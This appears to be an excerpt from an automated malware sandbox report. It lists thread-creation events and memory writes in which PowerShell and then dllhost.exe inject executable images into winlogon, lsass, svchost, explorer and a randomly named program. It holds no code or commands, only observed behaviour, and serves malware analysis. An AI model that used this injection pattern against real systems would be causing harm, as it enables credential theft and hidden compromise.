Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 16225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15C42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 497C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3DBE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A9EB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 98472EBC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F20A0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFC900000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFC900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE14340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1AFE4460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 27C93250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 24463CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 227C0130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23A44F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F530850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13376160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 3010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 27D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 11B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 3040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 27B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 6F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2EC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 21F0000 value starts with: 4D5A
